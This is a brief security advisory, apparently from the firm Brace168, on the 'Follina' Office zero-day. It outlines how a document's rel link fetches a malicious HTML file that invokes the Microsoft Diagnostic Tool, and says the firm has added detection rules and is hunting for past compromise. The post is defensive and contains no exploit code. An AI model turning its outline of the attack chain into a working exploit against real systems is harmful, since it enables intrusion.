A new zero-day vulnerability affecting office applications, dubbed “Follina”, has been discovered in the past few days. This vulnerability functions as a “zero click” remote code execution, where the exploit can be executed without actually needing to open the file.
Follina works by exploiting the Microsoft Diagnotic Tool (msdt), which runs even when macros have ben disabled. The process starts with a rel link within a Microsoft Office document which calls out and downloads a malicious html script. This HTML script will then invoke the msdt component and run the exploit. Evidence of this vulnerability being actively exploited can be traced back at least 1 month ago with a sample having been uploaded to a malware sandbox. It is important to note that to preview pane execution of this vulnerability can also be executed in rich text format files (.rtf extensions).
Brace168 have pushed new detection rules in order to identify any potential executions or exploitation of the “Follina” zero-day vulnerability within client environments. The Brace168 threat hunt team is also conducting active retrospective hunts to identify any activity that may have already occurred.